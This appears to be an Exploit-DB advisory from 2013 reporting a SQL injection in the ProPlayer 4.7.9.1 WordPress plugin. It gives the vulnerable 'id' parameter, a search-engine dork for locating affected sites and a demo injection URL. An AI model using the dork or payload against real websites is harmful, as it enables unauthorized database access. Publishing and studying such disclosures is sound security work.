WordPress Plugin ProPlayer 4.7.9.1 - SQL Injection
Author: Ashiyane Digital Security Team
type: webapps
platform: php
port:
date_added: 2013-05-21
date_updated: 2013-05-24
verified: 1
codes: OSVDB-93564
tags: WordPress Plugin
aliases:
screenshot_url:
application_url: http://www.exploit-db.comproplayer.4.7.9.1.zip
##############
# Exploit Title : WordPress ProPlayer Plugin SQL Injection
#
# Exploit Author : Ashiyane Digital Security Team
#
# Plugin Link : http://wordpress.org/plugins/proplayer/
#
# Home : www.ashiyane.org
#
# Security Risk : High
#
# Version : 4.7.9.1
#
# Dork : inurl:wp-content/plugins/proplayer/playlist-controller.php?id=
#
# Tested on: Linux
#
##############
#Location:site/wp-content/plugins/proplayer/playlist-controller.php?id=[SQL]
#
#
#DEm0:
# http://server/wp-content/plugins/proplayer/playlist-controller.php?id=32-0%27
#
##############
#Greetz to: My Lord ALLAH
##############
#
# Amirh03in
#
##############